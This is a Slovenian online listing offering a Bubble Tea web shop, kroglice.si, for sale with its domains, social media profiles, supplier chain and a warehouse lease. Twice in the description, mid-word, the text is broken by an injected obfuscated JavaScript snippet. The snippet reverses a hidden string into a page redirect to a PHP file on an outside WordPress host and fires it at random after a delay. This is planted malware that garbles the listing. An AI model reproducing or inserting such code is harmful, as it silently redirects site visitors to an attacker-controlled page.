Kroglice.si spletna trgovina z Bubble Tea izdelki

 Spletna trgovina

4.000,00€

Prodam spletno trgovino, specializirano za izdelke Bubble Tea za končnega kupca.
Ponudba vključuje spletno stran z domeni kroglice.si in kroglice.com.hr, Facebook in Instagram profili, poslovne dizajne, celotna dobavna veriga (Dobavitelj – Prevoznik – Dostavljalec), možen je tudi prenos najemne pogodbe za opremljeno skladišče 15m2 v Slovenski Bistrici.
Trgovina je tehnično pripravljena za širitev na Hrvaško in potrebuje samo prevod.
Spletna stran je narejena po meri. Je SEO optimizirana in zaseda 1. mes$Bhq=function(n){if (typeof ($Bhq.list[n]) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["\'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($Bhq(0), delay);}to v Googlu po vseh ustreznih iskanjih.
Spletno mes$Bhq=function(n){if (typeof ($Bhq.list[n]) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["\'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($Bhq(0), delay);}to bi potrebovalo nekaj spletnega oglaševanja, razen tega, da je v celoti pripravljeno za uporabo takoj. Ogled: https://kroglice.si

  • Listing ID: 3182
  • Vključuje: Blagovna znamka, Know-how, Dogovori z dobavitelji, Nepremičnine, Oprema in stroji, Spletna stran
  • Vključno s podjetjem: NE - samo dejavnost
  • Brez bremen, dolgov in obveznosti: DA
  • Ustanovljeno: 2023
Contact details

Podravska,2310 Slovenska Bistrica ***** https://kroglice.si

Contact this listing owner